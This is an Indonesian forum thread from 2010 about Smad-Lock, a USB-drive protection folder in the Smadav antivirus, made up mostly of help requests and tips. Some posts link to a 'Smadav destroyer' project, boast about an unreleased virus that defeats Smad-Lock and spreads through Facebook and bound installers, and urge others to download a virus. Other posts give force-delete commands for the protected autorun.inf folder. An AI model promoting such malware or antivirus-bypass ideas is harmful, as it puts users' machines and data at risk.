Mau tahu tugasnya apa??....Company Profile yang harus disertai dengan cover label CD dan cover wadah CD. Tugas sebenarnya sudah selesai tapi flashdisk-ku sama sekali tidak menyisakan folder untuk dibuka...adanya malah smadlock buatan Anda.....

Tolong bantu saya untuk membuka kembali folder saya yang tidak terlihat.



Bagaimana bisa? Coba lakukan ini untuk menampilkan folder yang tak terlihat:
- Pada jendela Windows Explorer klik Tools > Folder Options.
- Buka tab View
- Pilih Show Hidden Files and Folders dan buang tanda centang di kotak "Hide protected operating system files"
- Klik OK.
Atau cara mudahnya scan flashdisk anda dengan SmadAV. SmadAV akan menampilkan daftar folder yang tersembunyi dan menampilkannya kembali.

Tapi saya tidak yakin SmadAV yang menghilangkan semua isi folder flashdisk Anda. Mungkin dari faktor luar, seperti flashdisk corrupt atau terinfeksi virus dari komputer lain.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: gerald pada Januari 22, 2010, 08:48:37 AM
>:(

besok tugasku dikumpulkan dan sekarang aku harus ke warnet lagi untuk mengerjakan tugas dari awal!!! (padahal sudah 2 hari aku tidak tidur sama sekali buat mengerjakan tugas itu...komputer di rumah lemot)


Mau tahu tugasnya apa??....Company Profile yang harus disertai dengan cover label CD dan cover wadah CD. Tugas sebenarnya sudah selesai tapi flashdisk-ku sama sekali tidak menyisakan folder untuk dibuka...adanya malah smadlock buatan Anda.....

Tolong bantu saya untuk membuka kembali folder saya yang tidak terlihat.



ada kemungkinan flash disk anda kena virus , minggu lalu tmnku lebih parah lagi , data kuliah semuanya ilang dan flashdisknya harus diformat .  hati2 kalo ke warnet , jgn lupa taruh smadav di flashdisknya dan aktifkan di komp kita main dan lakukan full scan
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Januari 22, 2010, 01:59:22 PM
@ up
ea kkalo perlu kita harus kuasai Warnet nya beserta segala isinya, jadi kan mudah mengaturnya wkewekwek
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: seven7colour pada Januari 24, 2010, 02:24:16 PM
Harusnya kalau tugas penting selalu dibikin backup di media lain dong  8)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Januari 26, 2010, 04:00:27 PM
Harusnya kalau tugas penting selalu dibikin backup di media lain dong  8)
Bener sih.. tapi kalo lagi buru buru gimana? masa harus di backup semuanya.... kan makan banyak memori gitu nyahaha~
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: seven7colour pada Januari 26, 2010, 08:30:15 PM
Harusnya kalau tugas penting selalu dibikin backup di media lain dong  8)
Bener sih.. tapi kalo lagi buru buru gimana? masa harus di backup semuanya.... kan makan banyak memori gitu nyahaha~

Kalau penting ya harus ada backupnya......
Kalau tidak penting, kenapa di backup.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Januari 31, 2010, 10:37:42 AM
@ up
kalo ke back up secara gak sengaja gimana?
kalo lagi backup mati lampu gimana?
kalo lagi back up ada yang nelpon gimana?
kalo lagi back up perut laper gimana?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kocho pada Januari 31, 2010, 07:05:35 PM
>:(

besok tugasku dikumpulkan dan sekarang aku harus ke warnet lagi untuk mengerjakan tugas dari awal!!! (padahal sudah 2 hari aku tidak tidur sama sekali buat mengerjakan tugas itu...komputer di rumah lemot)


Mau tahu tugasnya apa??....Company Profile yang harus disertai dengan cover label CD dan cover wadah CD. Tugas sebenarnya sudah selesai tapi flashdisk-ku sama sekali tidak menyisakan folder untuk dibuka...adanya malah smadlock buatan Anda.....

Tolong bantu saya untuk membuka kembali folder saya yang tidak terlihat.





masa?????
q pernah punya file penting mulai dari master software ampe file word....semuanya q masukin smadlock...trus pas FD q colokin ke kompi yang positiv ada virusnya yg ke infeksi malah file2 yang ada diluar smad lock...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Misteruddin Digital Media pada Januari 31, 2010, 07:28:01 PM
@ up
kalo ke back up secara gak sengaja gimana?
kalo lagi backup mati lampu gimana?
kalo lagi back up ada yang nelpon gimana?
kalo lagi back up perut laper gimana?
perntanyaan yang membinggungkan ~x(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Februari 01, 2010, 02:43:49 PM
@ up
kalo ke back up secara gak sengaja gimana?
kalo lagi backup mati lampu gimana?
kalo lagi back up ada yang nelpon gimana?
kalo lagi back up perut laper gimana?
perntanyaan yang membinggungkan ~x(
Nyahaha jawabannya simpel
Itumah "DL"
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ugotownddude pada Februari 02, 2010, 12:33:46 PM
... apa iya tuh folder autorun.inf sama smad-lockny gak bisa dihapus?? ... (trus kayaknya berlebihan banget dee kalo udah sampe sumbar gak ada viser lokal yang bisa mentahin "proteksi"ny mas Zai, masih banyak koq mas viser2 Indonesia yang bisa mentahin teknik2ny mas cuman dalam semalam...)

nb : gak ad niat mow buad debad kusir yang alot ... cuman mau ngingetin aj kalo diatas langit masih ad langit ...  \m/

8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)

H.I.D.U.P V.I.S.E.R I.N.D.O.N.E.S.I.A !!!

8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)8)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Februari 03, 2010, 09:56:50 AM
@up":yang ngerasa data filenya korup, pindahin data yang masih bisa diselamatkan ke media lain..tru fromat uFD kamu pake hp utility disk..cari aja diforum dengan kata kunci "Hp utilty disk"...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Februari 03, 2010, 06:44:38 PM
Saya baru saja menyaksikan bahwa ada bug dimana tombol "Tidak" pada konfirmasi pengebalan flashdisk tidak merespon apa-apa.... :D
Judul: SMAD-LOCK WAS HACKED BY ROXX
Ditulis oleh: Roxx pada Februari 16, 2010, 05:45:17 PM
http://roxx-share.blogspot.com/2010/02/pro-smadav-destroyer-vb60-project-by.html (http://roxx-share.blogspot.com/2010/02/pro-smadav-destroyer-vb60-project-by.html)  :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: JYL pada Februari 19, 2010, 10:17:16 PM
kak Zai
puingin nanya
kalo kita masukin flashdisk,smad lock itu udah langsung terbentuk di flashdisk kita ya??
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Februari 19, 2010, 10:24:00 PM
kak Zai
puingin nanya
kalo kita masukin flashdisk,smad lock itu udah langsung terbentuk di flashdisk kita ya??
kan uda auto tuh setau gw
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Dephy pada Februari 20, 2010, 01:23:27 PM
efeknya apa klw file exe di klik di dalam flashdisk nya mas???? :-\
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Rizzal pada Februari 20, 2010, 01:57:10 PM
kak Zai
puingin nanya
kalo kita masukin flashdisk,smad lock itu udah langsung terbentuk di flashdisk kita ya??
autorun.inf otomatis
Sedangkan Brankas smadav..
harus manual.. di tab tool>smad-lock,pilih lock

efeknya apa klw file exe di klik di dalam flashdisk nya mas???? :-\
File exe,gak bisa di buka di dalam folder Smad-lock(Brankas smadav)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Februari 20, 2010, 03:37:02 PM
kak Zai
puingin nanya
kalo kita masukin flashdisk,smad lock itu udah langsung terbentuk di flashdisk kita ya??
autorun.inf otomatis
Sedangkan Brankas smadav..
harus manual.. di tab tool>smad-lock,pilih lock

efeknya apa klw file exe di klik di dalam flashdisk nya mas???? :-\
File exe,gak bisa di buka di dalam folder Smad-lock(Brankas smadav)
ya bener tuh karena di brankas ada lambang deltanya
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Februari 20, 2010, 03:50:41 PM
hebat virus bangsa sendiri bisa menjebol keamana sendiri ;D ;D ;D ;D ;D ;D ;D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: sevenfold96 pada Februari 21, 2010, 10:41:08 AM
sebaiknya smad-lock dikasih tulisan smad-lock biar gk binggung dulu aq binggung krn smad-lock nggak bisa di deleted aq kira ini viruses jadi diberi nama biar gk binggung !!!!!!!!!!!!!!!!! ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Februari 21, 2010, 07:20:07 PM
@up:bukannya samd-lock udah ada nanmany?yang pake lambang unicode segitiga...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: JYL pada Februari 28, 2010, 01:01:03 AM
waduh,wa masih bingung nih masalah smad-lock
habis waktu wa liat di fd,gak ada yang namanya smad-lock
kok gitu??
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Februari 28, 2010, 01:26:04 AM
@JYL:

Ya... karena mulai Smadav 2010 Rev. 8.0 dan seterusnya hanya folder autorun.inf yang akan dibuat Smadav. Untuk membuat folder <>Smad-Lock (Brankas Smadav)<> bisa lewat Tools > Smad-Lock :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: wh0n9 pada Maret 03, 2010, 02:30:45 PM
ndan bisa minta bantuan gak?
fd saya di lock ma warnet bangsat yg gak bisa unlock kembali fd saya.  saya malah di maki2 trus klo komplen ya yg buat software bukan ke saya. :o.http://smadaver.com
ni gejala fd saya:
fd saya gak bisa buat folder baru, di isi file2 gak bisa, di format jg gak bisa...
ternyata autorun.inf di proteksi ma Smadav saya dah install Smadav 2010 rev.8 trs saya unlock gak bisa. saya coba unlocker 1.8.8 jg gak bisa ~x(
please dari pihak http://smadaver.com bisa ngasih solusi gak..?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Maret 03, 2010, 02:41:36 PM
@up:coba anda gunakan av impor untuk menscan ufd anda...ada kemungkinan ufd anda terkena worm alman...dan coba format ufd anda menggunakan utilty hp...silahkan search di forum...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: wh0n9 pada Maret 04, 2010, 07:40:15 PM
@up:coba anda gunakan av impor untuk menscan ufd anda...ada kemungkinan ufd anda terkena worm alman...dan coba format ufd anda menggunakan utilty hp...silahkan search di forum...
ndan dah saya scan ma avira, avas dan mcavee dak ada tanda kena virus? data saya saya pindah pake windows gak bisa, trs saya coba pake linux baru bisa di kopy dan tetep gak bisa diformat di linux :'(

trs saya coba di ms-dos
- ATTRIB -A -S -H -R G:\autorun.inf
-RD "G:\autorun.inf\con\aux\nul
-RD "G:\autorun.inf\con\aux
-RD "G:\autorun.inf\con
-RD "G:\autorun.inf
jg gak bisa ~x(
saya blom nemukan utilty hp? bisa kasih tau softwarenya namanya apa?
-bisa gak fd saya/ autorun.inf smardav di format ma utilty hp?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: wh0n9 pada Maret 04, 2010, 07:58:27 PM
ndan dah saya format dgn hp usbdisk storage format tool tp tetep gak bisa printah
error
device media is write-protected.
plese help me ^:)^ ^:)^ ^:)^
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: JYL pada Maret 05, 2010, 11:29:02 PM
@JYL:

Ya... karena mulai Smadav 2010 Rev. 8.0 dan seterusnya hanya folder autorun.inf yang akan dibuat Smadav. Untuk membuat folder <>Smad-Lock (Brankas Smadav)<> bisa lewat Tools > Smad-Lock :D
oouh
oke2
baru ngerti nih
makasih ya^^ :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Maret 06, 2010, 06:38:52 PM
@JYL:

Ya... karena mulai Smadav 2010 Rev. 8.0 dan seterusnya hanya folder autorun.inf yang akan dibuat Smadav. Untuk membuat folder <>Smad-Lock (Brankas Smadav)<> bisa lewat Tools > Smad-Lock :D
oouh
oke2
baru ngerti nih
makasih ya^^ :-bd
ow jadi sekarang gak auto ya ??? ???
gak kayak dulu lagi :-bd :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: aldi_gila pada Maret 12, 2010, 11:58:11 AM
bener tuh,,
semenjak flasdisk aku datanya tak tarih di Smad-Lock (Brankas Smadav)
jadi aman ,,,,,,,,,
gak ada virus yang berani nempel??
smadav emang jagoan??? :-bd :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kopi_darat pada Maret 12, 2010, 04:46:38 PM
smad lock emang berguna juga Terutama Buat Nyimpen2 File office cape juga kan klo udah cape2 kita buat ke infeksi virus trus di dlete Otomatis  :'(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: mankbut ajuz pada Maret 12, 2010, 05:27:52 PM
smad lock emang berguna juga Terutama Buat Nyimpen2 File office cape juga kan klo udah cape2 kita buat ke infeksi virus trus di dlete Otomatis  :'(
rename aja tpi  unicodenya jgn di hilangin
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 19, 2010, 01:18:03 PM
Yang dimaksud Unicode itu yang Segitiga kan?
Kalo Windows kita berbahasa Jepang, berati virus bisa masuk donk? Soalnya kan Jepang Unicode?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 19, 2010, 07:56:56 PM
(http://img340.imageshack.us/img340/7409/123j.png)

Sya sarankan SMadav rev 8.2 diperbaiki bagian smadlocknya
soalnya di forum private saya kelmahan smadlcok sudah bsa ditemukan
Smadlock sudah bsa dilumpuhkan sma virus Ansmadcock yg berfungsi utk melumpuhkan smadlock___

Tapi sayangya ne virus belum diluncurkan di Indonesia. Soalnya ne virus akan dilengkap dengan teknik rootkit dan teknik virus smada________
 :D :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 20, 2010, 01:59:01 AM
(http://img340.imageshack.us/img340/7409/123j.png)

Sya sarankan SMadav rev 8.2 diperbaiki bagian smadlocknya
soalnya di forum private saya kelmahan smadlcok sudah bsa ditemukan
Smadlock sudah bsa dilumpuhkan sma virus Ansmadcock yg berfungsi utk melumpuhkan smadlock___

Tapi sayangya ne virus belum diluncurkan di Indonesia. Soalnya ne virus akan dilengkap dengan teknik rootkit dan teknik virus smada________
 :D :D :D

Heh? Jadi beneran nih SMADlock uda kebobolan?
Kalo bener perlu teknik baru neh... Saya dukung dengan doa buat Developer SMADAV :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 20, 2010, 09:08:09 PM
@^: Smadlcok bugnya sudah lama ditemukan
Th virus variant lama yg belum pernah disebarin makanya smadav ngk bsa ngedeteksi_____
th sya coba di laptop sya__
Kalau samplenya saya sudah jelas punya

 =)) =)) =))
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 20, 2010, 09:12:38 PM
Oh, menggunakan folder Smad-lock dengan icon folder untuk dijadiin virus gitu? Wuakakakakak, VM Indonesia memang kreatif :D
Mas Zai tolong di tanggapin dan diantisipasi D:
== EDIT ==
Yah! Ntar File gw semua di Smad Lock bablas semua dong?!
Bahaya nih!
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 20, 2010, 09:44:36 PM
Wah semoga ditemukan solusi yang terbaru  :'(
Banyak file penting ane yang ane simpen di Smadlock  ^:)^
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 10:54:13 AM
Oh, menggunakan folder Smad-lock dengan icon folder untuk dijadiin virus gitu? Wuakakakakak, VM Indonesia memang kreatif :D
Mas Zai tolong di tanggapin dan diantisipasi D:
== EDIT ==
Yah! Ntar File gw semua di Smad Lock bablas semua dong?!
Bahaya nih!

Bukan mas file smadlock diinfeksi sama virus Ansamadlock______

Seperti kerja virus flu burung yg menginfeksi file word______

Jadi jika folder smadlock diinfeksi, maka semua folder di smadlock dihilangkan atau diinfeksi_____
Sampai sejauh ini belum saya telitiin lagi gimana cara kerjanya_____

Virus ansmadlock dibuat dengan power basic___
Bekerja di OS Linux, Windows XP - 7___
Katanya sh bekerja di Macintos juga____

File induknya sudah di deteksi AVG sih

Kalau mau lihat th di Gudang virus AVG yg ada di Screen shot sebelumnya
di path
F:\Software Hack!ng.exe

Itu dia induknya______

^^
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 21, 2010, 10:58:45 AM
Oh, menggunakan folder Smad-lock dengan icon folder untuk dijadiin virus gitu? Wuakakakakak, VM Indonesia memang kreatif :D
Mas Zai tolong di tanggapin dan diantisipasi D:
== EDIT ==
Yah! Ntar File gw semua di Smad Lock bablas semua dong?!
Bahaya nih!

Bukan mas file smadlock diinfeksi sama virus Ansamadlock______

Seperti kerja virus flu burung yg menginfeksi file word______

Jadi jika folder smadlock diinfeksi, maka semua folder di smadlock dihilangkan atau diinfeksi_____
Sampai sejauh ini belum saya telitiin lagi gimana cara kerjanya_____

Virus ansmadlock dibuat dengan power basic___
Bekerja di OS Linux, Windows XP - 7___
Katanya sh bekerja di Macintos juga____

File induknya sudah di deteksi AVG sih

Kalau mau lihat th di Gudang virus AVG yg ada di Screen shot sebelumnya
di path
F:\Software Hack!ng.exe

Itu dia induknya______

^^
Wah berati file film dan sopwer yang disimpan di smadlock langsung ilang neh?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 21, 2010, 11:09:15 AM
Keluarin dulu ah :D
Eh ngga usah :D
Rename Foldernya aja :D
Kan efek unicode Segitiganya masih ada :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 11:15:32 AM
@giganticskies : Tergantung apa yg ada di dalam folder smadlock kk_______
Kalau type file di dalam smadlock seperti: .exe, .doc, .com, .bat, .cmd, .JGP ( Gambar2 dan file office ) Akan diubah jadi virus
Tapi kalau ekstensi yg diluar dari yg atas katanya si hilang________

 :D :D :D

filenya agak besar sih
2.3MB belum di pack____

@S4nji: Tapi katanya smadlock ngk boleh di rename___
Kan sudah jelas di sebutkan di Readmenya______
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: h3ndr@fum! pada Maret 21, 2010, 11:20:24 AM
wah kacau mana FD lg di pinjem, file penting
ada di smadlock smua lg.. :(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kamikazhe pada Maret 21, 2010, 11:21:45 AM
kayaknya sekarang smadav dah jadi target virus maker
ayO smadav BUKTIKAN MERAHMU
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 11:39:12 AM
@^: Jah kami hanya sekilas aja buat virus utk melumpuhkan file yg pakai Unicode  ;> ;>____

Kalau AV lokal yg sering kami kerjain th seperti PCMAV, dan CMC____

Susah2 gampang melumpuhkan AV PCMAV yg terbuat dengan delphi dan CMC dengan Power BAsic___________

Soalnya bahasannya sulit gimana gitu____

 :D :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 21, 2010, 12:05:28 PM
Dipack palingan <500 KB
Trus media penyebaran ane liat autorun? autorun.inf.exe?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 12:18:12 PM
Th hasil infeksinya mas_________
Infeksi autorun.inf Smadlock jadi autorun.inf.exe

Medianya FB katanya dari aplikasi yg ilegal________

 :D :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 21, 2010, 12:24:35 PM
FB... ~_~
Autorun.infnya untuk smadav aja?
Kalau ane pakai metode lain macem Panda?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 21, 2010, 12:57:42 PM
FB... ~_~
Autorun.infnya untuk smadav aja?
Kalau ane pakai metode lain macem Panda?
Hmm... Maksudnya cara lain kek Panda?
Gawat neh kalo dah nda aman...  :'(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 12:59:43 PM
@^: Kata yg buat sh
Kelemahan smadlock terletak pada autorun.inf sehingga dia buat file yg bsa menginfeksi dan melumpuhkan smadlock

Kalau di FB sih itu rencananya utk disebarin
seperti kasus gadis berbikini di FB yg membuat kompi terkena virus

Tapi itu katanya ngk jadi____
 8) 8) 8) 8)

Mungkin ngikut cara terjadul virus meylisa kali_______

 :D :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 21, 2010, 01:26:31 PM
Jangan jangan ga jadinya boong D:
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: giganticskies pada Maret 21, 2010, 01:30:03 PM
Wew...
Denger-denger unicode segitiga juga bikin aman folder ya?
Kudu ati-ati neh kalo Online   :x
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 07:17:17 PM
Jangan jangan ga jadinya boong D:

Yah pokoknya mungkin tahap pertama lewat FD, software yg di binder ( Mungkin Smadav Kna dibinder )______

Ketimbang email dirasakan kurang ampuh____
^^
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Maret 21, 2010, 07:21:41 PM
Virusnya di bind ama apa? smadav81.exe?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: raikenjenova pada Maret 21, 2010, 07:31:54 PM
Ini ada yg gunakan kode angka yg ga bisa dibaca mungkin. Kan virus laknat tuh semuanya pake software DILUAR microsoft dan tidak berfungsi di folder windows (dikit pngetahuan dari IT)
Trus sbenarnya bikin virus tu apa untungnya? Promosi? Malah dia diincer utk (maaf kata) dibunuh kalo dapat.
(Masih kesal gara2 virus nya) >:( >:( >:(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 21, 2010, 07:50:09 PM
@S4nji: Tergantung kk
Jika komputer blum di install maka yg di infeksi smadav.exe
Jika sudah terinstal yg di infeksi Smartp.exe ( Maknya akan ditambahkan fungsi smada )

@raikenjenova : wkwkwk
Simple aja kk
Jika tidak ada virus sama sekali di dunia IT
maka secara otomatis tida ada AntiVirus
Jika Virus lokal punah, maka antivirus lokal pun juga punah_______

 >=) >=) >=) >=)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: prutie pada Maret 22, 2010, 11:13:31 AM
tolong doong.. solusinya kalo semua folder di flashQ uda masuk smad lock trus gak sengaja auto run-mya kehapusss...

aduuuuhhh

mampus neh ke hidden semua... tolongin.. ~x(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: h3ndr@fum! pada Maret 22, 2010, 11:24:32 AM
tolong doong.. solusinya kalo semua folder di flashQ uda masuk smad lock trus gak sengaja auto run-mya kehapusss...

aduuuuhhh

mampus neh ke hidden semua... tolongin.. ~x(

coba scan pake smadav
biasanya kalo ke hidden
smadav bisa nemuin file yg ke hidden itu :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Rizzal pada Maret 22, 2010, 01:18:55 PM
(http://img340.imageshack.us/img340/7409/123j.png)

Sya sarankan SMadav rev 8.2 diperbaiki bagian smadlocknya
soalnya di forum private saya kelmahan smadlcok sudah bsa ditemukan
Smadlock sudah bsa dilumpuhkan sma virus Ansmadcock yg berfungsi utk melumpuhkan smadlock___

Tapi sayangya ne virus belum diluncurkan di Indonesia. Soalnya ne virus akan dilengkap dengan teknik rootkit dan teknik virus smada________
 :D :D :D

Wah ada gambar Saya di situ!
Rizzal
Wkwkwkwkwkw :D

Boleh Minta Virus nya gak mas?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Maret 22, 2010, 04:36:36 PM
@^; weleh mas ngk bleh mas.
kalau mas anggota forum private kmi mas sdh dgt file virusnya.
ne hnya sy ksh tw aj. sblm vr5 ne d luncrkan
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fadil programer pada Maret 24, 2010, 03:59:31 PM
ko smadav lock yang diberikan pada smadav versi terbaru file nya bisa diinfeksi oleh virus, tolong dong smadav locknya diperbaiki karena saya sering menaruh file di smadav lock biar aman
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada Maret 31, 2010, 10:00:31 PM
mw nanya nih gw..kok Smad-Lock na kaga ada ia saat FD gw di colok? pdhl RTP nya nyala tuh

jdi gw colokin FD abis di format n uda d pake..ada SMADAV yg RTP na jalan tp kaga ada Smad-Lock di FD gw
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada April 01, 2010, 09:38:51 AM
@up:sekarang smad-lock kagak dibuat otomatis ke flashdisk...musti manual...
caranya..masuk ke main windows smadav...klik tools=>smadlock
ntar centang drive yang mau di lock..klik lock...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada April 01, 2010, 02:01:43 PM
@up:sekarang smad-lock kagak dibuat otomatis ke flashdisk...musti manual...
caranya..masuk ke main windows smadav...klik tools=>smadlock
ntar centang drive yang mau di lock..klik lock...

OK thx..dah berhasil..sorry klo kaga coba" tp langsung tny >.<
soalna dlu auto jdi kaga ngerti hehe..~

btw, ni klo kaga masukin file ke smad-lock FD gw tetep aman dr autorun.inf kan?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: aricil28 pada April 04, 2010, 10:35:59 AM
wah pntezan ja saya prnah delete g bisa, heheh
kirain virus eh trnyta itu dri folder smad-lock
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: lerry apriantony pada April 28, 2010, 08:19:07 PM
Smadavlock sungguh bermanfaat sekali fiturnya....
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: hatjulhasbi pada April 28, 2010, 09:03:05 PM
kok smad lock gak bisa di hapus ya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada April 28, 2010, 09:18:48 PM
kok smad lock gak bisa di hapus ya?

pnyaku bisa tuh..klo kaga bisa lewat sini :

1. buka smadav
2. tools
3. smad-lock
4. di unlock deh
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada April 29, 2010, 02:03:00 PM
boleh saran kaga?

kan pada smadav" versi sebelumnya..

smad-lock akan membuat folder bernama Δ Smad-Lock Δ

tapi sekarang Δ Smad-Lock (Brankas Smadav) Δ

bukannya lebih keren tanpa brankas?

tp cuma saran sih.. >.<
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada April 30, 2010, 07:17:17 AM
udh prnh djwb bro soal itu ma mas zai, cb di search aj.. :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Mei 02, 2010, 11:23:47 AM
@up:sekarang smad-lock kagak dibuat otomatis ke flashdisk...musti manual...
caranya..masuk ke main windows smadav...klik tools=>smadlock
ntar centang drive yang mau di lock..klik lock...

OK thx..dah berhasil..sorry klo kaga coba" tp langsung tny >.<
soalna dlu auto jdi kaga ngerti hehe..~

btw, ni klo kaga masukin file ke smad-lock FD gw tetep aman dr autorun.inf kan?
insya allah...law virusnya lum berevolusi...tapi selama anda men-lock FD ma sad-lock mudah2n autorun.inf tetap aman...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: c0d3HitLER pada Mei 04, 2010, 08:52:43 PM
di blog morphost ada virus yang bisa bobol smad-lock, bener gag sih? :-\
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Mei 07, 2010, 12:02:01 PM
di blog morphost ada virus yang bisa bobol smad-lock, bener gag sih? :-\
bener banget tuh. klo gak percaya download virusnya n bka aja.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Gugel pada Mei 07, 2010, 01:34:32 PM
di blog morphost ada virus yang bisa bobol smad-lock, bener gag sih? :-\
masuk sini :
http://morphians.wordpress.com/2010/01/15/bagaimana-kalau-semua-virus-lokal-bisa-menembus-smad-lock/
http://morphians.wordpress.com/2010/04/03/virus-chantiqs-satu-satunya-virus-matikan-proteksi-smadav/
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Mei 07, 2010, 02:22:22 PM
Baru tahu ane
Rupanya folder autorun.inf smadav ada folder yg tidak bsa dihapus ya
Kalau ngk salah namanya: Con, Aux, dll
Bah
Kalau gtu AVB jga bsa kayak gtu dg
 :-bd :-bd :-bd :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Gugel pada Mei 07, 2010, 04:22:19 PM
Baru tahu ane
Rupanya folder autorun.inf smadav ada folder yg tidak bsa dihapus ya
Kalau ngk salah namanya: Con, Aux, dll
Bah
Kalau gtu AVB jga bsa kayak gtu dg
 :-bd :-bd :-bd :-bd
more info about Con, Aux, Nul, Prn
go to : http://support.microsoft.com/kb/279868

dah pernah nyobain yg ini blm : <-- utk Menghapus Folder autorun.inf yang diproteksi con,nul.,aux
1. Buka CMD (start-run-tulis CMD)
2. Ketikan perintah berikut “RD /S /Q \\.\F:\autorun.inf”

klo di visual basic 6.0 pake perintah shell
Shell "cmd /c rd /s /q \\.\F:\autorun.inf"

note -->:  F= drive flashdisk
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Shafry(virusanalyst) pada Mei 09, 2010, 10:39:26 PM
Baru tahu ane
Rupanya folder autorun.inf smadav ada folder yg tidak bsa dihapus ya
Kalau ngk salah namanya: Con, Aux, dll
Bah
Kalau gtu AVB jga bsa kayak gtu dg
 :-bd :-bd :-bd :-bd
yup dan juga "autorun.inf" smadav karena didalamnya miliki desktop.ini yang berisi
